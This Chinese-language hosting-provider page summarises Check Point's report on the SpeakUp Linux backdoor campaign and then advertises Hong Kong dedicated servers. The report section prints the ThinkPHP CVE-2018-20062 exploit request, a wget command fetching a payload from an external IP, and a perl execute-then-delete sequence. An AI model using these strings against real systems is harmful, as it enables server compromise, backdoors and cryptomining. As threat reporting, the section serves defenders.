【小編提示】本文部分內(nèi)容摘自網(wǎng)絡(luò),僅供參考!如需了解服務(wù)器租用\托管相關(guān)問題,請咨詢YINGSOO專業(yè)客服,享受1V1貼心服務(wù)!免費熱線400-630-3752

　　【本周熱銷】香港服務(wù)器租用丨美國服務(wù)器租用

　　【選購幫助】如何部署在香港云服務(wù)器網(wǎng)站優(yōu)化，使其訪問速度更快？

　　日前，全球屈指一首的internet安全解決方案供應(yīng)商check point it安全部門研究人員發(fā)現(xiàn)了一個通過目前Linux服務(wù)器漏洞植入后門木馬的黑客活動，此次攻擊的目標(biāo)涵蓋了包括Aws主機在內(nèi)的世界范圍的全部服務(wù)器。攻擊范圍涵蓋了共6個不同Linux發(fā)行版和macos系統(tǒng)服務(wù)器中的已知漏洞，目前黑客的主要攻擊目標(biāo)集中在東亞與拉美地區(qū)的Linux服務(wù)器。

　　全球speakUp“受害者”分部

　　這次的惡意攻擊的罪魁禍?zhǔn)妆幻麨閟peakUp，命名方式是以其中一臺命令與控制（c2）服務(wù)器名稱進行命名的。據(jù)悉check point的研究人員發(fā)現(xiàn)speakUp通過Linux服務(wù)器漏洞來植入后門木馬的攻擊方式可以繞過目前所有安全產(chǎn)品，這是由于該惡意軟件中存儲了大量此前出現(xiàn)過的攻擊案例，致使speakUp可以優(yōu)先識別目前存在的安全漏洞，并成功繞過幾乎所有的殺毒軟件的“雙眼”。speakUp樣本采集在check point的分析報告中顯示，首次發(fā)現(xiàn)的speakUp樣本是今年1月14日在我國的服務(wù)器上發(fā)現(xiàn)的，該樣本曾在1月9日被上傳至Virustotal網(wǎng)站（專業(yè)的免費可疑文件分析服務(wù)網(wǎng)站）。但經(jīng)過嚴(yán)密的監(jiān)測后發(fā)現(xiàn)，^{[韓國高防護vps]}沒有一家安全產(chǎn)品將speakUp惡意軟件標(biāo)為惡意。

　　這是因為為了逃避安全檢測，speakUp的代碼采用了base64加鹽算法加密。不僅如此，c2通信也是采用了相同的方式加密。這也是為什么Virustotal上的殺毒引擎無法將其檢測為惡意的原因所在。speakUp感染全過程：植入腳本階段根據(jù)check point報告中披露的數(shù)據(jù)來看，speakUp首先是利用thinkpHp（輕量級pHp開發(fā)框架）的一個漏洞為攻擊起點，從中植入一個pHp shell腳本。使用get請求（如下所示），通過thinkpHp遠(yuǎn)程代碼執(zhí)行漏洞cVe-2018-20062將shell腳本發(fā)送到目標(biāo)服務(wù)器：s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php這個shell腳本接下來會通過query中的“module”參數(shù)來執(zhí)行命令。植入后門階段在腳本生效之后，speakUp將進行像服務(wù)器植入后門的操作發(fā)送另一個Http請求（如下所示）到目標(biāo)服務(wù)器：/?module=wget hxxp://67[.]209.177.163/ibus -o /tmp/e3ac24a0bcddfacd010a6c10f4a814bc實際上，這是一個注入過程，目的是植入ibus payload并將其存儲到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc啟動后門并抹除痕跡階段在植入后門成功后，speakUp將對服務(wù)器發(fā)送請求，啟動后門，在啟動后門后speakUp將通過刪除文件來清楚自己的感染痕跡。使用如下Http請求來執(zhí)行后門：/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bcspeakUp感染后果：在Linux服務(wù)器被感染后，speakUp使用post和get請求來與c2通信，c2是被黑的speakupomaha[.]com.。第一個post請求會發(fā)送受害者id和其他介紹性的信息，比如安裝的腳本的當(dāng)前版本等。對應(yīng)的c2響應(yīng)是needrgr，表示受感染的受害者之前未在服務(wù)器上注冊，需要注冊。之后，木馬會通過執(zhí)行以下的Linux命令來post機器的全部信息：· Uname (-r, -v, -m, -n,-a, -s)· whoami· ifconfig –a· Arp –a· cat /proc/cpuinfo | grep -c “cpu family” 2>&1· who –b

　　一旦受感染服務(wù)器注冊完成，c2服務(wù)器就會發(fā)送新的任務(wù)——不同的c2服務(wù)器會命名受感染服務(wù)器來下載和執(zhí)行不同的文件。有一個需要注意的點是，speakUp使用了User-Agent用戶代理。具體來說，speakUp定義了三個用戶代理，而受感染服務(wù)器在與c2服務(wù)器進行通信時必須使用這些代理。其中兩個代理是macos X User-Agent，第三個是經(jīng)過哈希處理的字符串：mozilla/5.0 (ipad; U; cpU os 3_2_1 like mac os X; en-us) ApplewebKit/531.21.10 (KHtmL, like gecko) mobile/bAddAdmozilla/5.0 (ipad; U; cpU os 3_2_1 like mac os X; en-^[YINGSOO]us) ApplewebKit/531.21.10 (KHtmL, like gecko) mobile/7b405e9bc3bd76216AFA560bFb5AcAF5731A3

　　目前，speakUp主要服務(wù)于XmRig礦工，為其提供“肉雞（受感染服務(wù)器）”。根據(jù)XmRHunter網(wǎng)站的查詢結(jié)果顯示，攻擊者的錢包目前擁有約107枚門羅幣。speakUp強大的自我傳播能力攻擊者還為speakUp配備了一個“i”模塊，它實際上是一個python腳本，使得speakUp能夠掃描和感染位于受感染服務(wù)器所處內(nèi)網(wǎng)和外網(wǎng)的其他更多的Linux服務(wù)器。其主要功能有：使用預(yù)定義的用戶名和密碼來暴力破解嘗試登陸管理面板；掃描受感染服務(wù)器的網(wǎng)絡(luò)環(huán)境，檢測共享相同內(nèi)部和外部子網(wǎng)掩碼的服務(wù)器上的特定端口的可用性；嘗試?yán)媚繕?biāo)服務(wù)器上的遠(yuǎn)程代碼執(zhí)行漏洞

　　高端香港服務(wù)器租用選擇

　　對于需要更高資源的復(fù)雜網(wǎng)站和任務(wù)關(guān)鍵型應(yīng)用程序，高端服務(wù)器可能是最合適的托管解決方案。這些高性能托管解決方案可確保您的網(wǎng)站性能更加流暢，并使您的網(wǎng)站訪問者獲得最佳用戶體驗。其中，高端的香港服務(wù)器租用是搭建面向中國大陸、香港及亞太區(qū)廣泛客戶群的跨境電商網(wǎng)站、國際電郵、網(wǎng)絡(luò)游戲等業(yè)務(wù)的重要平臺。擁有數(shù)百萬訪問者的網(wǎng)站根本無法托管在VPS或入門級獨立服務(wù)器上。這就是高端服務(wù)器發(fā)揮作用的地方。

　　一、什么是高端香港服務(wù)器

　　我們知道，典型的香港服務(wù)器租用是提供一臺功能強大的物理服務(wù)器，連接到高速互聯(lián)網(wǎng)連接，并安裝在最先進的香港數(shù)據(jù)中心設(shè)施中。

　　高端專用服務(wù)器是一種先進的系統(tǒng)，配備強大的CPU，更大的內(nèi)存模塊，RAID磁盤和備份。它具有更強勁的計算能力，專為實現(xiàn)最高性能和滿足企業(yè)工作負(fù)載而設(shè)計。

　　二、高端香港服務(wù)器租用配置

　　高端香港服務(wù)器租用通常用于托管高流量網(wǎng)站，Web應(yīng)用程序以及性能至關(guān)重要的其他托管方案。典型的高端專用服務(wù)器將包括以下內(nèi)容：

　　? 單/雙最新Intel E5 2650以上系列處理器

　　? 64 GB到512 GB RAM。

　　? 帶RAID 10的8至24 TB SATA或高速SSD。

　　? 冗余電源和冷卻裝置。

　　? 每日備份。

　　以上只是一個示例配置，可根據(jù)獨特要求進行定制/升級。

　　三、高端香港服務(wù)器租用的用途

　　到目前為止，我們已經(jīng)了解了高端專用^{[網(wǎng)站建設(shè)中域名知多少]}服務(wù)器及其基本配置?，F(xiàn)在，我們來看看它們是如何使用的。

　　1、分割和托管虛擬機

　　設(shè)置HyperVisor服務(wù)器并在其上托管較小的虛擬機，可能是高端服務(wù)器的最常用用途。通常，服務(wù)商使用這些高端服務(wù)器來托管多個虛擬機并向其客戶銷售，也就是我們以前常接觸的VPS。在某些情況下，企業(yè)還租用一臺大型服務(wù)器來創(chuàng)建一個小型虛擬機，以便在內(nèi)部使用它們。

　　2、托管高流量網(wǎng)站

　　托管一個吸引成千上萬個并發(fā)請求的網(wǎng)站(如電商網(wǎng)站)是資源密集型的，許多網(wǎng)站管理員選擇“擴展”到更強大的服務(wù)器，而不是“擴展”到許多功能較弱的服務(wù)器。選擇單個高端專用服務(wù)器的管理要比構(gòu)建小型服務(wù)器集群要簡單得多。

　　3、構(gòu)建Web服務(wù)器以托管多個網(wǎng)站

　　大多數(shù)網(wǎng)絡(luò)托管公司和網(wǎng)絡(luò)服務(wù)提供商在高端服務(wù)器上構(gòu)建他們的產(chǎn)品。中等配置的高端服務(wù)器能夠托管數(shù)百甚至數(shù)千個較小的站點。

　　4、搭建私有云

　　私有云和公共云平臺都是基于高端專用服務(wù)器構(gòu)建的，但許多企^{[云服務(wù)器價格對比]}業(yè)更喜歡自己的云來托管其專有應(yīng)用程序。在這種情況下，許多企業(yè)選擇租用高端香港服務(wù)器，來運行他們自己的私有云，虛擬機和其他托管服務(wù)。

　　YINGSOO電話：4006-303-752

　　熱門文章：【服務(wù)器速度】【美國安全服務(wù)器怎么保證安全】【如何選擇合適的服務(wù)器】【獨立ip服務(wù)器有哪些優(yōu)勢】【服務(wù)器宕機原因】【香港沙田服務(wù)器速度怎么樣】【裸金屬服務(wù)器】【香港虛擬主機排行】【怎么用流量攻擊服務(wù)器】【免費服務(wù)器】【為什么要推薦香港vps】【香港cn2主機排行】【高防服務(wù)器的種類有哪些】【香港云主機排名】【如何保障香港獨立服務(wù)器的安全】【如何選擇上等的美國服務(wù)器】【高性價比日本高防服務(wù)器租用】【高速集群服務(wù)器是什么】【魔獸懷舊服最有牌面的服務(wù)器】【ddos攻防不斷】

　　YINGSOO韓國主機代理3天免費試用,注冊享特惠!

　　韓國主機代理控制面板自主管理,5分鐘交付,KT高品質(zhì)機房,平均延遲低至80ms,2019年韓國主機代理銷量再度破表,1200家企業(yè)共同選擇,高達95%的續(xù)約率印證YINGSOO品質(zhì)

　　http://www.sddonglingsh.com/products/cloud-kr.html

　　香港主機 按月買,就選YINGSOO,用了都說好

　　9年香港主機 按月買業(yè)務(wù)運營經(jīng)驗,連續(xù)3年香港主機 按月買業(yè)務(wù)名列前茅.香港寬頻,HKT機房核心合作伙伴,1200家企業(yè)客戶共同選擇,24小時在線服務(wù)

　　http://www.sddonglingsh.com/products/cloud-hk.html

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。